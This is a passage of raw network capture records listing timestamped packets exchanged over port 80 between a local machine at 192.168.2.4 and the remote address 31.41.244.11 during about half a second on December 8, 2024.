                                                                                                                                          Dec 8, 2024 18:06:10.418848038 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.418906927 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.418936968 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.418978930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.423080921 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.423142910 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.423144102 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.423183918 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.546891928 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.546969891 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.547003031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.547051907 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.548681021 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.548724890 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.548878908 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.548923969 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.552325964 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.552373886 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.552433968 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.552478075 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.555982113 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.556046963 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.556055069 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.556101084 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.559493065 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.559537888 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.559552908 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.559598923 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.563045025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.563096046 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.563257933 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.563304901 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.566663027 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.566731930 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.566804886 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.566848993 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.570673943 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.570722103 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.570782900 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.570827007 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.573890924 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.573935986 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.574022055 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.574065924 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.577369928 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.577415943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.577476978 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.577518940 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.581089973 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.581140041 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.581176996 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.581221104 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.584583998 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.584630966 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.584638119 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.584683895 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.588167906 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.588232040 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.588236094 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.588279963 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.591752052 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.591799021 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.591852903 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.591898918 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.595377922 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.595433950 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.595521927 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.595566034 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.598948956 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.599030018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.599061966 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.599112988 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.602543116 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.602588892 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.602658987 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.602701902 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.606087923 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.606136084 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.606200933 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.606245995 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.609718084 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.609757900 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.609879017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.609924078 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.613369942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.613424063 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.613450050 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.613495111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.616851091 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.616903067 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.617017984 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.617063046 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.620485067 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.620547056 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.620559931 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.620605946 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.624063015 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.624109983 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.624268055 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.624330044 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.627639055 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.627681971 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.627741098 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.627784014 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.631283045 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.631324053 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.631335020 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.631381035 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.634885073 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.634928942 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.635030031 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.635075092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.738981962 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.739032984 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.739274025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.739331007 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.741229057 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.741290092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.741393089 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.741446972 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.742945910 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.742991924 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.742999077 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.743038893 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.746067047 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.746125937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.746185064 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.746236086 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.749147892 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.749196053 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.749278069 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.749346018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.752265930 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.752324104 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.752325058 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.752370119 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.755297899 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.755347967 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.755408049 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.755445004 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.758385897 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.758449078 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.758469105 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.758511066 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.761430025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.761476994 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.761537075 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.761580944 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.764493942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.764539003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.764619112 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.764661074 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.767596960 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.767642021 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.767709017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.767750978 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.770678043 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.770735979 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.770777941 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.770823002 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.773797035 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.773847103 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.773869038 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.773909092 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.776793957 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.776839972 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.776925087 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.776972055 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.779870033 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.779915094 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.779983997 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.780024052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.782936096 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.782984018 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.783058882 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.783104897 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.786055088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.786104918 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.786159039 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.786201000 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.789076090 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.789118052 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.789155006 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.789196968 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.792107105 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.792152882 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.792239904 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.792284012 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.795180082 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.795222998 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.795273066 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.795324087 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.798243999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.798300982 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.798386097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.798433065 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.801387072 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.801444054 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.801464081 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.801476955 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.804425001 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.804482937 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.804636955 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.804680109 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.807465076 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.807521105 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.807612896 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.807663918 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.810529947 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.810584068 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.810652018 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.810689926 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.813612938 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.813664913 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.813719034 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.813766003 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.816665888 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.816725969 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.816766024 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.816813946 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.819736958 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.819797993 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.819830894 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.819871902 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.822801113 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.822849989 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.823004007 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.823046923 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.825860977 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.825906038 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.825975895 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.826132059 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.828939915 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.828990936 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.829051971 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.829094887 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.832024097 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.832087994 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.832169056 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.832211971 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.835084915 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.835129976 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.835215092 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.835256100 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.838213921 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.838263988 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.838313103 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.838357925 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.841248989 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.841294050 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.841420889 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.841460943 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.844276905 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.844336033 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.844388008 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.844439030 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.848025084 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.848071098 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.848103046 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.848145008 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.850888014 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.850930929 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.851003885 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.851043940 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.853488922 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.853533030 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.853600979 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.853646994 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.856549025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.856591940 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.856760979 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.856806040 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.859590054 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.859636068 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.859718084 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.859756947 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.862719059 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.862761974 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.862853050 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.862898111 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.865765095 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.865809917 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.865845919 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.865890026 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.868839025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.868880987 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.868917942 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.868964911 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.930917025 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.930995941 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.931034088 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.931082010 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.932151079 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.932200909 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.932245016 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.932288885 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.934092999 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.934139013 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.934247017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.934288979 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.936635017 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.936681986 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.936743975 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.936789036 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.939120054 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.939167976 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.939265966 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.939308882 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.941545010 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.941587925 CET4976580192.168.2.431.41.244.11
                                                                                                                                          Dec 8, 2024 18:06:10.941648960 CET804976531.41.244.11192.168.2.4
                                                                                                                                          Dec 8, 2024 18:06:10.941694021 CET4976580192.168.2.431.41.244.11
